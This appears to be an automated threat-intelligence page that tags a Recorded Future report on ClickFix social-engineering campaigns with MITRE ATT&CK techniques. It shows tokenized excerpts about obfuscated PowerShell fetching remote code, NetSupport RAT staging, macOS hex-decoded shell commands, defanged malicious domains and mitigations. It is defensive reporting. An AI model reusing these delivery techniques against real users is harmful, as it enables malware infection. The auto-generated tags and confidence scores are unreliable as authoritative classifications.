TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Recorded Future Blog

ClickFix Campaigns Targeting Windows and macOS

2026-03-25 · Read original ↗

ATT&CK techniques detected

48 predictions
T1059.001PowerShell
97%
“system clipboard. instructions on the verification page manipulate the victim into opening the windows run dialog box and entering the command. executing this malicious command starts the infection chain for netsupport rat. figure 8 : command from the booking campaign that reache…”
T1074.001Local Data Staging
97%
“" soul ", and " desire ", to generate a randomized folder name under % localappdata %, where the staging files are placed. the script retrieves four primary files from nobovcs [. ] com, detailed in table 2. filename sha - 256 at. 7z c0af6e9d848ada3839811bf33eeb982e6c207e4c4001041…”
T1204.004Malicious Copy and Paste
95%
“lures for both windows and macos users. unlike standard clickfix behavior that typically pushes commands to the clipboard automatically, this variant provides detailed manual instructions, requiring the victim to open native system tools and manually copy and paste the provided s…”
T1204.004Malicious Copy and Paste
94%
“the victim ' s clipboard. the developer left comments within the code that detail the deobfuscated purpose of each line. for example, one comment explicitly identifies the portion of the command calling powershell with specific flags ( figure 13 ). figure 13 : portion of javascri…”
T1204.004Malicious Copy and Paste
93%
“. although this cluster recently pivoted to targeting users of the us real estate marketplace zillow, quickbooks - related artifacts and brand - specific imagery remain deeply embedded throughout the document object model ( dom ) of the malicious landing pages. cluster 1 profile …”
T1204.001Malicious Link
93%
“clickfix campaigns targeting windows and macos executive summary insikt group identified five distinct clusters leveraging the clickfix social engineering technique to facilitate initial access to host systems. observed since at least may 2024, these clusters include those impers…”
T1204.004Malicious Copy and Paste
92%
“) with invoke - expression ( iex ) this allows for the seamless retrieval and execution of remote code entirely in memory. this combination is a high - fidelity hunt for clickfix activity. string manipulation deception using. substring ( ) or. replace ( ) to " build " commands cl…”
T1204.004Malicious Copy and Paste
92%
“a fragmented threat landscape. the technical core of the methodology relies primarily on pastejacking, where background javascript populates a victim ' s clipboard with an obfuscated command while they are distracted by visual lures such as fraudulent recaptcha or cloudflare turn…”
T1204.004Malicious Copy and Paste
90%
“clickfix campaigns targeting windows and macos executive summary insikt group identified five distinct clusters leveraging the clickfix social engineering technique to facilitate initial access to host systems. observed since at least may 2024, these clusters include those impers…”
T1059.001PowerShell
89%
“##hell script ( figure 4 ) executes in a hidden window. this stager uses self - referential function names to dynamically construct and invoke invoke - restmethod to the domain nobovcs [. ] com. figure 4 : obfuscated powershell command executed in a hidden window, dynamically rec…”
T1204.004Malicious Copy and Paste
85%
“- land ( lotl ) approach allows malicious scripts to execute in - memory, effectively bypassing traditional browser security and endpoint controls. parallel clusters targeting sectors as diverse as accounting, real estate, and legal services indicates that clickfix has transition…”
T1204.004Malicious Copy and Paste
84%
“##ins ), remote ingress from threat actor - controlled infrastructure, and immediate in - memory execution. this methodology allows threat actors to stage and run remote code with limited and short - lived forensic artifacts on the host system. background first documented in late…”
T1204.004Malicious Copy and Paste
84%
“system utilities such as powershell and terminal remain accessible to end - users, clickfix will continue to offer threat actors a high - return, low - complexity alternative to traditional exploit kits. looking ahead, clickfix lures will likely become increasingly technically ad…”
T1059.004Unix Shell
83%
“> zsh the use of xxd - r - p in a user - initiated command is a significant indicator of malicious intent, as it is rarely used in legitimate troubleshooting. persistence and backgrounding use of nohup and the & operator this ensures the malicious process continues to run in the …”
T1204User Execution
81%
“a fragmented threat landscape. the technical core of the methodology relies primarily on pastejacking, where background javascript populates a victim ' s clipboard with an obfuscated command while they are distracted by visual lures such as fraudulent recaptcha or cloudflare turn…”
T1204.004Malicious Copy and Paste
76%
“selective browser fingerprinting, while continuing to use infrastructure that can be built and dismantled quickly. in addition to technical refinements, insikt group predicts that the social engineering component will continue to evolve, leveraging new techniques to lure victims …”
T1204.004Malicious Copy and Paste
74%
“: booking. com cluster 2 was observed operating from february 2026 to the time of writing, impersonating the travel agency booking. com. insikt group tracked the cluster by pivoting on a unique dom hash made possible by the threat actor ’ s repeated use of a unique html title and…”
T1204User Execution
73%
“##ins ), remote ingress from threat actor - controlled infrastructure, and immediate in - memory execution. this methodology allows threat actors to stage and run remote code with limited and short - lived forensic artifacts on the host system. background first documented in late…”
T1059.001PowerShell
72%
“of network traffic. use identity module : recorded future customers should leverage the identity module to monitor for credentials and passwords being sold on the dark web that have been stolen by information stealers. disable windows run dialog via group policy objects ( gpos ) …”
T1204.002Malicious File
69%
“execution and abuse of native command - line utilities. user awareness and training : conduct targeted social engineering simulations that specifically educate users on the dangers of " manual verification " prompts that require copying and pasting commands into system utilities.…”
T1547.001Registry Run Keys / Startup Folder
67%
“##58aacdcc36b18858d128d6b3058e0ea607a4dc59eb95b18b7c6acc7c table 2 : filenames and sha256 hashes of the files downloaded from nobovcs [. ] com ( source : recorded future ) the script uses 7z. exe to extract at. 7z ( protected by the password “ pppp ” ), which contains the netsupp…”
T1059.001PowerShell
63%
“. although this cluster recently pivoted to targeting users of the us real estate marketplace zillow, quickbooks - related artifacts and brand - specific imagery remain deeply embedded throughout the document object model ( dom ) of the malicious landing pages. cluster 1 profile …”
T1202Indirect Command Execution
62%
“> zsh the use of xxd - r - p in a user - initiated command is a significant indicator of malicious intent, as it is rarely used in legitimate troubleshooting. persistence and backgrounding use of nohup and the & operator this ensures the malicious process continues to run in the …”
T1204.001Malicious Link
61%
“##ins ), remote ingress from threat actor - controlled infrastructure, and immediate in - memory execution. this methodology allows threat actors to stage and run remote code with limited and short - lived forensic artifacts on the host system. background first documented in late…”
T1059.001PowerShell
59%
“the victim ' s clipboard. the developer left comments within the code that detail the deobfuscated purpose of each line. for example, one comment explicitly identifies the portion of the command calling powershell with specific flags ( figure 13 ). figure 13 : portion of javascri…”
T1059.007JavaScript
57%
“the page, the victim is prompted to run a command in the windows run dialog box. insikt group identified this cluster by pivoting on unique technical identifiers within the html artifacts, including a consistent and unique page title and a static image used across the infrastruct…”
T1204.002Malicious File
51%
“selective browser fingerprinting, while continuing to use infrastructure that can be built and dismantled quickly. in addition to technical refinements, insikt group predicts that the social engineering component will continue to evolve, leveraging new techniques to lure victims …”
T1566.002Spearphishing Link
48%
“accounting software, often leveraging aged domains to bypass security filters booking. com : used fraudulent domains to present fake verification portals birdeye : a large - scale cluster that lures users of the ai marketing company birdeye by spoofing domains and manipulating vi…”
T1204.004Malicious Copy and Paste
47%
“relies on a narrow set of trusted lolbins and lightweight obfuscation to stage remote code with minimal forensic artifacts. the technical implementation of clickfix follows a standardized four - stage pattern across all target operating systems, as summarized in table 12. stage a…”
T1204.004Malicious Copy and Paste
47%
“the page, the victim is prompted to run a command in the windows run dialog box. insikt group identified this cluster by pivoting on unique technical identifiers within the html artifacts, including a consistent and unique page title and a static image used across the infrastruct…”
T1204.001Malicious Link
43%
“selective browser fingerprinting, while continuing to use infrastructure that can be built and dismantled quickly. in addition to technical refinements, insikt group predicts that the social engineering component will continue to evolve, leveraging new techniques to lure victims …”
T1071.001Web Protocols
43%
“##fix domains in real time. use recorded future threat intelligence : recorded future customers can proactively mitigate this threat by operationalizing recorded future intelligence operations platform data, specifically by leveraging continuously updated risk lists and by blockl…”
T1204User Execution
40%
“selective browser fingerprinting, while continuing to use infrastructure that can be built and dismantled quickly. in addition to technical refinements, insikt group predicts that the social engineering component will continue to evolve, leveraging new techniques to lure victims …”
T1547.001Registry Run Keys / Startup Folder
39%
“##b18b7c6acc7c table 4 : filenames and sha256 hashes of the files downloaded from checkpulses [. ] com ( source : recorded future ) the 7z. exe utility is used to extract at. 7z, which contains the netsupport rat binary neservice. exe. persistence is established by adding a link …”
T1204.004Malicious Copy and Paste
39%
“. ] 244 [. ] 70. the domain hotelupdatesys [. ] com, resolves to the same ip address as the netsupport rat c2 for sign - in - op - token [. ] com. figure 10 : post request from sign - in - op - token [. ] com showing netsupport interaction ( source : recorded future ) cluster 3 :…”
T1204.002Malicious File
39%
“- land ( lotl ) approach allows malicious scripts to execute in - memory, effectively bypassing traditional browser security and endpoint controls. parallel clusters targeting sectors as diverse as accounting, real estate, and legal services indicates that clickfix has transition…”
T1204.004Malicious Copy and Paste
38%
“execution and abuse of native command - line utilities. user awareness and training : conduct targeted social engineering simulations that specifically educate users on the dangers of " manual verification " prompts that require copying and pasting commands into system utilities.…”
T1059.004Unix Shell
37%
“relies on a narrow set of trusted lolbins and lightweight obfuscation to stage remote code with minimal forensic artifacts. the technical implementation of clickfix follows a standardized four - stage pattern across all target operating systems, as summarized in table 12. stage a…”
T1059Command and Scripting Interpreter
36%
“> zsh the use of xxd - r - p in a user - initiated command is a significant indicator of malicious intent, as it is rarely used in legitimate troubleshooting. persistence and backgrounding use of nohup and the & operator this ensures the malicious process continues to run in the …”
T1583.001Domains
35%
“accounting software, often leveraging aged domains to bypass security filters booking. com : used fraudulent domains to present fake verification portals birdeye : a large - scale cluster that lures users of the ai marketing company birdeye by spoofing domains and manipulating vi…”
T1564.011Ignore Process Interrupts
34%
“> zsh the use of xxd - r - p in a user - initiated command is a significant indicator of malicious intent, as it is rarely used in legitimate troubleshooting. persistence and backgrounding use of nohup and the & operator this ensures the malicious process continues to run in the …”
T1204.002Malicious File
33%
“a fragmented threat landscape. the technical core of the methodology relies primarily on pastejacking, where background javascript populates a victim ' s clipboard with an obfuscated command while they are distracted by visual lures such as fraudulent recaptcha or cloudflare turn…”
T1204.004Malicious Copy and Paste
32%
“of network traffic. use identity module : recorded future customers should leverage the identity module to monitor for credentials and passwords being sold on the dark web that have been stolen by information stealers. disable windows run dialog via group policy objects ( gpos ) …”
T1546.013PowerShell Profile
32%
“system clipboard. instructions on the verification page manipulate the victim into opening the windows run dialog box and entering the command. executing this malicious command starts the infection chain for netsupport rat. figure 8 : command from the booking campaign that reache…”
T1204.004Malicious Copy and Paste
32%
“insikt group assesses with high confidence that the information stealer macsync was the primary payload used to infect victims in this cluster. the malicious commands on these pages caused the infected systems to reach out to a specific set of staging and c2 infrastructure, detai…”
T1059.001PowerShell
31%
“the page, the victim is prompted to run a command in the windows run dialog box. insikt group identified this cluster by pivoting on unique technical identifiers within the html artifacts, including a consistent and unique page title and a static image used across the infrastruct…”
T1204.001Malicious Link
30%
“lures for both windows and macos users. unlike standard clickfix behavior that typically pushes commands to the clipboard automatically, this variant provides detailed manual instructions, requiring the victim to open native system tools and manually copy and paste the provided s…”
T1218.011Rundll32
30%
“and scalable delivery framework capable of deploying a wide variety of secondary payloads, including infostealers like lumma stealer and vidar, or remote access trojans ( rats ) such as netsupport rat and odyssey stealer. these operations are frequently supported by highly adapti…”

Summary

Insikt Group reveals five ClickFix social engineering clusters (QuickBooks, Booking.com, Birdeye) targeting Windows and macOS. Learn how threat actors exploit native system tools with malicious, obfuscated commands to gain initial access, and get key mitigations for defense